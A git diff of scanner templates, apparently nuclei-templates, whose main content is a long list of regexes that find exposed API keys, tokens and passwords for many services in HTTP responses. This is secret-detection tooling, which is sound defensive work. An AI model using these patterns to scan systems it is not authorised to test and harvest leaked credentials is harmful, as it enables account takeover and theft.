https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go metadata: - max-request: 1 verified: true + max-request: 1 tags: flutterwave,exposure,tokens,secretkey http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - FLWSECK_TEST-(?i)[a-h0-9]{32}-X \ No newline at end of file + - FLWSECK_TEST-(?i)[a-h0-9]{32}-X diff --git a/http/exposures/tokens/frameio/frameio-token.yaml b/http/exposures/tokens/frameio/frameio-token.yaml index fbad1a0ebb..e8c2a8afe6 100644 --- a/http/exposures/tokens/frameio/frameio-token.yaml +++ b/http/exposures/tokens/frameio/frameio-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: frameio,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - fio-u-(?i)[a-z0-9\-_=]{64} \ No newline at end of file + - fio-u-(?i)[a-z0-9\-_=]{64} diff --git a/http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml b/http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml index 6bafe9dfce..7bebb6c093 100644 --- a/http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml +++ b/http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: freshbooks,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:freshbooks)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:freshbooks)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/generic/credentials-disclosure.yaml b/http/exposures/tokens/generic/credentials-disclosure.yaml index 818b233ace..7f2c0d3ba2 100644 --- a/http/exposures/tokens/generic/credentials-disclosure.yaml +++ b/http/exposures/tokens/generic/credentials-disclosure.yaml @@ -5,12 +5,11 @@ info: author: Sy3Omda,forgedhallpass,geeknik severity: unknown description: Look for keys/tokens/passwords in HTTP responses, exposed keys/tokens/secrets requires manual verification for impact evaluation. - tags: exposure,token,key,api,secret,password,generic metadata: max-request: 1 + tags: exposure,token,key,api,secret,password,generic # Example cases to match against: https://regex101.com/r/HPtaU2/1 - http: - method: GET path: @@ -23,692 +22,3440 @@ http: - type: regex part: body regex: - - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?zopim[_-]?account[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?zhuliang[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?zensonatypepassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" - "(?i)zendesk(_api_token|_key|_token|-travis-github|_url|_username)(\\s|=)" - - "(?i)[\"']?yt[_-]?server[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?partner[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?partner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?account[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yt[_-]?account[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yangshun[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?yangshun[_-]?gh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?www[_-]?googleapis[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?ssh[_-]?connect[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?report[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?prepare[_-]?dir[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpt[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wporg[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wordpress[_-]?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wordpress[_-]?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wincert[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?test[_-]?server[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?fb[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?fb[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?widget[_-]?basic[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?watson[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?watson[_-]?device[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?watson[_-]?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?wakatime[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vscetoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?visual[_-]?recognition[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?virustotal[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vip[_-]?github[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?v[_-]?sfdc[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?v[_-]?sfdc[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?usertravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?user[_-]?assets[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?user[_-]?assets[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?use[_-]?ssh[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?urban[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?urban[_-]?master[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?urban[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?unity[_-]?serial[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?unity[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitteroauthaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitteroauthaccesssecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitter[_-]?consumer[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twitter[_-]?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twine[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?configuration[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?chat[_-]?account[_-]?api[_-]?service[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?twilio[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?trex[_-]?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?trex[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?secure[_-]?env[_-]?vars[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?pull[_-]?request[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?e2e[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?com[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?branch[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?travis[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?token[_-]?core[_-]?java[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?thera[_-]?oss[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?tester[_-]?keys[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?test[_-]?test[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?test[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?tesco[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?svn[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?surge[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?surge[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stripe[_-]?public[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stripe[_-]?private[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?strip[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?strip[_-]?publishable[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?stormpath[_-]?api[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?starship[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?starship[_-]?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?location[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?staging[_-]?base[_-]?url[_-]?runscope[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ssmtp[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sshpass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?srcclr[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?square[_-]?reader[_-]?sdk[_-]?repository[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sqssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sqsaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spring[_-]?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spotify[_-]?api[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spotify[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spaces[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?spaces[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?soundcloud[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?soundcloud[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatypepassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?token[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?token[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonatype[_-]?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonar[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonar[_-]?project[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sonar[_-]?organization[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?socrata[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?socrata[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snyk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snyk[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snoowrap[_-]?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snoowrap[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?snoowrap[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?slate[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?slash[_-]?developer[_-]?space[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?slash[_-]?developer[_-]?space[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?setsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?setdstsecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?setdstaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ses[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ses[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?service[_-]?account[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?endpoint[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?default[_-]?org[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sentry[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendwithus[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sendgrid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?selion[_-]?selenium[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?selion[_-]?log[_-]?level[_-]?dev[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?segment[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?key[_-]?base[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?9[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?8[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?7[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?6[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?5[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?4[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?3[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?11[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?10[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?secret[_-]?0[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?sdr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?scrutinizer[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 